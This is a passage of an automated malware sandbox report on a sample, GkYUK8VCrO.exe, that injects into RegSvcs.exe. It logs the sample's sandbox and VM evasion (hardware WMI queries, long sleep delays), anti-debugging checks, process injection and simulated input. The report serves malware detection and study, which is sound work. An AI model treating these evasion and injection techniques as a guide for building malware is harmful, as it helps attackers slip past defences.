                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeAPI/Special instruction interceptor: Address: A43234
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeAPI/Special instruction interceptor: Address: 1A63234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198983Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197638Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1021Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8831Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101575
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeAPI coverage: 4.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B04696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B04696
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B0C9C7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0C93C FindFirstFileW,FindClose,0_2_00B0C93C
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B0F200
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B0F35D
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B0F65E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B03A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B03A2B
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B03D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B03D4E
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B0BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B0BF27
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA4AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99774Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99491Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1199094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198983Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198201Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1198094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197638Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 1197188Jump to behavior
                Source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                Source: RegSvcs.exe, 00000003.00000002.4154081283.0000000005C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeAPI call chain: ExitProcess graph end nodegraph_0-98697
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeAPI call chain: ExitProcess graph end nodegraph_0-98877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B141FD BlockInput,0_2_00B141FD
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AA3B4C
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00AD5CCC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B1C304 LoadLibraryA,GetProcAddress,0_2_00B1C304
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00A434A0 mov eax, dword ptr fs:[00000030h]0_2_00A434A0
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00A43500 mov eax, dword ptr fs:[00000030h]0_2_00A43500
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00A41E70 mov eax, dword ptr fs:[00000030h]0_2_00A41E70
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 2_2_01A634A0 mov eax, dword ptr fs:[00000030h]2_2_01A634A0
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 2_2_01A63500 mov eax, dword ptr fs:[00000030h]2_2_01A63500
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 2_2_01A61E70 mov eax, dword ptr fs:[00000030h]2_2_01A61E70
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AF81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00AF81F7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ACA395
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00ACA364 SetUnhandledExceptionFilter,0_2_00ACA364
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 119A008Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AF8C93 LogonUserW,0_2_00AF8C93
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AA3B4C
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AA4A35
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B04EF5 mouse_event,0_2_00B04EF5
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AF81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00AF81F7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B04C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B04C03
                Source: GkYUK8VCrO.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: GkYUK8VCrO.exeBinary or memory string: Shell_TrayWnd
